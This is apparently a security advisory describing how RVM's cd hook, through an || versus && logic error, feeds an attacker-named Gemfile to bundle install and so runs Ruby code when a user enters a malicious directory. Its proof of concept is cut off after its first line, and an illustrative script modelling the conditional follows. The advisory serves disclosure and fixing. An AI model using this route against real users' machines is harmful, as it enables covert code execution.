RVM automatically does "bundle...

Published: 2025-04-13
Revised: 2025-04-13

RVM, by default, hooks `cd` and automatically parses a file named `.versions.conf` in the directory being changed to. The intention seems to be that, if the user's `${rvm_autoinstall_bundler_flag}` setting is enabled, then `.versions.conf` can specify a Gemfile that will automatically be fed to `bundle install`. Due to an erroneous conditional that uses `||` (OR) instead of `&&` (AND), `.versions.conf` can provide the name of an arbitrary Gemfile that will automatically be fed to `bundle install` regardless of the state of `${rvm_autoinstall_bundler_flag}`. The code responsible, as of a vulnerable commit, is available at <https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>.

This behaviour can be used to achieve immediate Ruby code execution upon `cd` into a malicious directory, since Gemfiles are interpreted using Ruby (see <https://github.com/bundler/bundler/issues/5178>).

### POC

```text
rvm@e6aeaf6d79ec:~$ mkdir poc...
```
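To make the logic error concrete, the following is an added illustration (not RVM's own code; the real conditional is at the linked commit): a minimal model of the hook's "should I run `bundle install`?" decision, with the `||` shape beside the `&&` shape. The function names, the flag values `0`/`1` and the Gemfile name are assumptions; nothing here invokes bundler.

```shell
#!/bin/sh
# Added illustration, not RVM's code. Inputs for both functions:
#   $1 = value of rvm_autoinstall_bundler_flag ("1" = enabled, "0" = disabled)
#   $2 = Gemfile path read from .versions.conf ("" when none is given)
# Return status 0 means "would run bundle install", 1 means "would not".

# Vulnerable shape: with `||`, a Gemfile named in .versions.conf is enough
# to trigger bundle install even when the autoinstall flag is disabled.
should_bundle_vulnerable() {
  flag="$1"; gemfile="$2"
  if [ "$flag" = "1" ] || [ -n "$gemfile" ]; then
    return 0
  fi
  return 1
}

# Fixed shape: with `&&`, the user's flag must be enabled AND a Gemfile
# must be named before anything is fed to bundle install.
should_bundle_fixed() {
  flag="$1"; gemfile="$2"
  if [ "$flag" = "1" ] && [ -n "$gemfile" ]; then
    return 0
  fi
  return 1
}

# Evaluate one of the functions over all four (flag, gemfile) cases and
# return the decisions as a 4-character string, in the order:
#   flag=0/no Gemfile, flag=0/Gemfile, flag=1/no Gemfile, flag=1/Gemfile
decision_table() {
  fn="$1"; out=""
  for flag in 0 1; do
    for gemfile in "" "Gemfile.custom"; do   # constructed sample name
      if "$fn" "$flag" "$gemfile"; then out="${out}1"; else out="${out}0"; fi
    done
  done
  printf '%s' "$out"
}
```

The second column of the table is the bug: only the `||` version answers "run" for a directory that names a Gemfile while the flag is off.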
